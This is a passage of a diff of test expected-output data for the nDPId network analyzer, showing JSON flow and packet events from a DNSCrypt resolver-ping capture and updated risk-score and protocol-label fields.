AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00698{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":213,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgvEAub0RmXMKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":213,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgvMgAL0RdJ4KAAABNEHrgdhxAbsGBOwCCnIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00702{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt.AmazonAWS","breed":"Acceptable","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":215,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgvMAub0RmXEKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":215,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":946739312102,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312102,"pkt":"ZmZmZmZmRERERERECABFAADUhiJAACkR6nc0QeuBCgAAAQG72hoAwNtICnOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="}
@@ -451,54 +451,54 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhiVAACkR6nQ0QeuBCgAAAQG7ukUAwPsiCm6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRfwgAL0RYAgKAAABMw8+QZecAbsGBGX0xUgBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":38812,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739312105,"pkt":"ZmZmZmZmRERERERECABFAADUhiZAACkR6nM0QeuBCgAAAQG72HEAwNzyCnKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAAAHR7dJhGoyFx8KdrkIsoh61C8rxtxAaFzxQo\/agVQzzjpZ5APiE6q3FOpAI96QjakMreCrdTAjP8EJbJX\/I6UH9uHXHTkXq4cOyA70iJwlafDxONoi+u6\/0zTNviG6FU724dcdORerhwAAAAFfU2DvX1Sybw=="}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":222,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAABQRfwAub0RhNsKAAABMw8+QQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":222,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAIcRf1AAL0RQ8cKAAABMw8+QbOpAbsCCDQmxUkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAHBAAwBvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00680{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312105,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739312105,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":946739312105,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739312105,"pkt":"REREREREZmZmZmZmCABFAAXcRf4gAL0RYAYKAAABMw8+Qd1wAbsGBCAixUYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydA5za3lmaWdodGVyLWRucwNjb20AABAAAQAAAAAAAAAAAAW9AAwFuQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA